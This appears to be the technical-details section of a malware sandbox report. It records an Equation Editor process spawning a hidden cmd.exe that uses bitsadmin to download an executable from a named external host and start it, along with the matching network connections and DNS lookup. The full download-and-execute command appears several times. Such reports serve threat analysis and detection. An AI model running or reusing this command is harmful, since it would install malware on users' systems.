Technical Information
- '%WINDIR%\syswow64\cmd.exe' /c bitsadmin /transfer mt /priority foreground http://natdrill.com.au/profiles/xc/new/outputA3A282F.exe %USERPROFILE%\SXh.exe && start %USERPROFILE%\SXh.exe
- 'na###ill.com.au':80
- 'na###ill.com.au':443
- 'na###ill.com.au':443
- DNS ASK na###ill.com.au
- '%WINDIR%\syswow64\cmd.exe' /c bitsadmin /transfer mt /priority foreground http://natdrill.com.au/profiles/xc/new/outputA3A282F.exe %USERPROFILE%\SXh.exe && start %USERPROFILE%\SXh.exe' (with hidden window)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\bitsadmin.exe' /transfer mt /priority foreground http://natdrill.com.au/profiles/xc/new/outputA3A282F.exe %HOMEPATH%\SXh.exe